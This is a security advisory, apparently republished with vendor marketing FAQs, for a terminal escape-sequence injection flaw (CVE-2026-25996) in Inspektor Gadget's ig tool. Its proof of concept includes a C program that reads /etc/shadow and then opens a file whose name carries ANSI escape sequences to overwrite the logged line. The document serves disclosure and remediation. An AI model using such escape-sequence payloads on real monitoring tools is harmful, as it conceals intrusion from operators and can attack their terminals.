Summary
Description
String fields from eBPF events in columns output mode are rendered to the terminal without any sanitization of control characters or ANSI escape sequences.
Therefore, a maliciously forged – partially or completely, event payload, coming from an observed container, might inject the escape sequences into the terminal of ig operators, with various effects.
The columns output mode is the default when running ig run interactively.
PoC
Attachments
run.sh
#!/bin/bash
set -e
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
CONTAINER_NAME="poc-escape-inject"
echo "Make sure ig is running in another terminal:"
echo " sudo ig run trace_open -c ${CONTAINER_NAME}"
echo ""
echo "Press Enter to continue..."
read -r
sudo docker run --rm \
--name "${CONTAINER_NAME}" \
-v "${SCRIPT_DIR}/escape_inject.c:/src/escape_inject.c:ro" \
gcc:latest \
bash -c "
gcc -o /tmp/escape_inject /src/escape_inject.c && \
/tmp/escape_inject
"
escape_inject.c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
static void read_file(const char *path)
{
int fd = open(path, O_RDONLY);
if (fd >= 0)
close(fd);
}
static void create_file(const char *path)
{
int fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);
if (fd >= 0)
close(fd);
}
int main(void)
{
printf("[1] normal activity\n");
create_file("/tmp/app.log");
printf("[2] malicious read of /etc/shadow\n");
read_file("/etc/shadow");
usleep(300000);
printf("[3] tampering the log\n");
create_file("/etc\x1b[1A/bashrc\x1b[1B\x1b[13C");
usleep(300000);
return 0;
}
- Setup a Linux host and build/install
igversion0.48.0 - Run the attached
run.shon a terminal - Run
sudo ig run trace_open -c poc-escape-injecton another terminal - Press "Enter" on the terminal attached to
run.sh - Observe the events traced by
ig - Notice that, at some point, the line where
/etc/shadowis logged is overwritten/etc/bashrc, demonstrating the log injection
Resources
Notes
The json output mode was already sanitizing the content.
Impact
The impact depends on the injection point, mostly due to length limitations, and on the terminal used by the operator when running displaying columns output.
At the very least, the injection can be used for Log Injection, by inserting new lines or deleting existing ones.
However, by leveraging Operating System Command (OSC) ANSI escape sequences, the impact on modern terminal can vary, possibly allowing an attacker to:
- lead to DoS (Denial of Service)
- write to the system clipboard
- create hyperlinks to attacker-controlled servers
- change window title
- potentially execute code (see referenced resources)
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-25996? CVE-2026-25996 is a medium-severity security vulnerability in github.com/inspektor-gadget/inspektor-gadget (go), affecting versions < 0.49.1. It is fixed in 0.49.1.
- Which versions of github.com/inspektor-gadget/inspektor-gadget are affected by CVE-2026-25996? github.com/inspektor-gadget/inspektor-gadget (go) versions < 0.49.1 is affected.
- Is there a fix for CVE-2026-25996? Yes. CVE-2026-25996 is fixed in 0.49.1. Upgrade to this version or later.
- Is CVE-2026-25996 exploitable, and should I be worried? Whether CVE-2026-25996 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-25996 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-25996? Upgrade
github.com/inspektor-gadget/inspektor-gadgetto 0.49.1 or later.